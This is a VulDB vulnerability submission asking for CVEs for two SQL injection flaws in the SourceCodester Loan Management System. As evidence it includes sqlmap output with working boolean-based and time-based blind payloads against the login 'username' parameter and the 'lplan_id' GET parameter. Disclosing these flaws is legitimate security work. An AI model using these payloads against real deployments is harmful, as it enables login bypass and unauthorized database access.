Enviar #42831: Loan-Management-System-Sqlinjectioninformación

TítuloLoan-Management-System-Sqlinjection
DescripciónThese are two different vulnerabilities and I need two Cves Sqlinjection 1 ``` sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: username=1' OR NOT 8877=8877#&password=1&login=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=1' AND (SELECT 4254 FROM (SELECT(SLEEP(5)))Ydjq)-- NMhF&password=1&login=1 --- [21:25:18] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.6.9 back-end DBMS: MySQL >= 5.0.12 ``` Sqlinjection 2 ``` GET parameter 'lplan_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 1899 HTTP(s) requests: --- Parameter: lplan_id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lplan_id=2'+(SELECT 0x714c6c4c WHERE 6948=6948 AND (SELECT 7588 FROM (SELECT(SLEEP(5)))BFGS))+' --- [21:51:10] [INFO] the back-end DBMS is MySQL [21:51:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [21:51:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] web application technology: PHP 5.6.9, Apache 2.4.39 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) ```
Fuente⚠️ https://github.com/cxaqhq/Loan-Management-System-Sqlinjection
Usuario
 cxaqhq (UID 23728)
Sumisión2022-08-04 16:20 (hace 4 años)
Moderación2022-08-05 07:23 (15 hours later)
EstadoAceptado
Entrada de VulDB205618 [SourceCodester Loan Management System login.php Nombre de usuario inyección SQL]
Puntos20

Interested in the pricing of exploits?

See the underground prices here!